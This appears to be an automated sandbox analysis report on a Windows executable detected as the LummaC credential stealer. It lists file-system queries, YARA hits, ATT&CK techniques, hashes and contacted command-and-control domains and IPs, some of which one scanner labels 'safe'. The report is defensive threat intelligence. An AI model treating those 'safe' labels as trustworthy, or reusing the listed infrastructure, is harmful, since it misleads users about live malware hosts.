Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000003.00000003.1611561835.0000000000E04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1611809499.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: random.exe.10.exe PID: 7908, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe.10.exe PID: 7908, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	141 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	11 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	21 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
random.exe.10.exe	74%	ReversingLabs	Win32.Trojan.LummaStealer

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://pancakedipyps.click:443/api	0%	Avira URL Cloud	safe
https://pancakedipyps.click:443/apihs	0%	Avira URL Cloud	safe
https://pancakedipyps.click/apiF	0%	Avira URL Cloud	safe
https://pancakedipyps.click/X	0%	Avira URL Cloud	safe
https://pancakedipyps.click:443/apiV	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pancakedipyps.click	104.21.23.76	true	false		high

Contacted URLs

Name	Malicious	Reputation
pancakedipyps.click	false	high
necklacebudi.lat	false	high
aspecteirs.lat	false	high
sustainskelet.lat	false	high
crosshuaht.lat	false	high
rapeflowwj.lat	false	high
https://pancakedipyps.click/api	false	high
energyaffai.lat	false	high
grannyejh.lat	false	high
discokeyus.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	random.exe.10.exe	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	random.exe.10.exe	false		high
http://ocsp.sectigo.com0	random.exe.10.exe	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	random.exe.10.exe	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5	random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/	random.exe.10.exe, random.exe.10.exe, 00000003.00000003.1556346819.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1697099979.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1738037021.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580204789.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1581457141.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580105512.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1557069609.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580349074.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738879819.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651202964.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651102094.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737376014.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1612223125.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1556181740.0000000003707000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pancakedipyps.click:443/api	random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	random.exe.10.exe	false		high
https://pancakedipyps.click:443/apihs	random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta	random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	random.exe.10.exe	false		high
https://sectigo.com/CPS0	random.exe.10.exe	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	random.exe.10.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/apiF	random.exe.10.exe, 00000003.00000003.1578903064.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1579093508.000000000370F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.	random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pancakedipyps.click/X	random.exe.10.exe, 00000003.00000003.1555532464.0000000003707000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1555702012.0000000003707000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pancakedipyps.click:443/apiV	random.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	random.exe.10.exe	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	random.exe.10.exe	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.23.76	pancakedipyps.click	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577461
Start date and time:	2024-12-18 13:48:40 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	random.exe.10.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 13 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target random.exe.10.exe, PID 7908 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: random.exe.10.exe

Simulations

Behavior and APIs

Time	Type	Description
07:49:47	API Interceptor	8x Sleep call for process: random.exe.10.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.23.76	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	http://www.czeywd.net/perishing-flavoring/7ec4w2395u86zL12Q21YJ51Rc07R28UHsr8D_u4IIr-6IwxfhDtvsFEsvZ7zQboRoK5AH10Y6B1i@Xb	Get hash	malicious	Phisher	Browse
	http://www.chkfmrc.net/a7f5s2n395K86ll11i1Uf0fw9dez18gZ_asttfFibYG4EsvZ7JQ1o9RR5zVW106Ik2i3b/shamefully-illogical	Get hash	malicious	Unknown	Browse
	http://www.chkfmrc.net/a7f5s2n395K86ll11i1Uf0fw9dez18gZ_asttfFibYG4EsvZ7JQ1o9RR5zVW106Ik2i3b/shamefully-illogical	Get hash	malicious	Phisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pancakedipyps.click	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	104.21.23.76
	random.exe_Y.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	172.67.209.202
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	172.67.209.202
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS	Browse	104.21.23.76
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, Xmrig	Browse	172.67.209.202
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	172.67.209.202

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	cali.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://www.mynylgbs.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://johnlewispartners.shop	Get hash	malicious	Unknown	Browse	104.19.163.95
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	104.21.80.99
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	172.67.177.42
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	104.21.23.76
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	zq6a1iqg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.23.76
	v_dolg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.23.76
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	104.21.23.76
	cccc2.exe	Get hash	malicious	LummaC	Browse	104.21.23.76
	CompleteStudio.exe	Get hash	malicious	LummaC	Browse	104.21.23.76
	winrar-x64-701.exe	Get hash	malicious	Unknown	Browse	104.21.23.76
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	104.21.23.76
	alexshlu.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.23.76
	99awhy8l.exe	Get hash	malicious	LummaC	Browse	104.21.23.76
	random.exe_Y.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.859727158445845
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	random.exe.10.exe
File size:	776'832 bytes
MD5:	afd936e441bf5cbdb858e96833cc6ed3
SHA1:	3491edd8c7caf9ae169e21fb58bccd29d95aefef
SHA256:	c6491d7a6d70c7c51baca7436464667b4894e4989fa7c5e05068dde4699e1cbf
SHA512:	928c15a1eda602b2a66a53734f3f563ab9626882104e30ee2bf5106cfd6e08ec54f96e3063f1ab89bf13be2c8822a8419f5d8ee0a3583a4c479785226051a325
SSDEEP:	12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
TLSH:	75F4120237C085B2D92324B5A8F8DF765B3EF8204B226AE75788073B8FB15D6477664D
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x405952
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:	0x67601EA3 [Mon Dec 16 12:35:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2ab4b10182ffafd3eedee95a25f64213

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	30/08/2023 20:00:00 30/08/2026 19:59:59
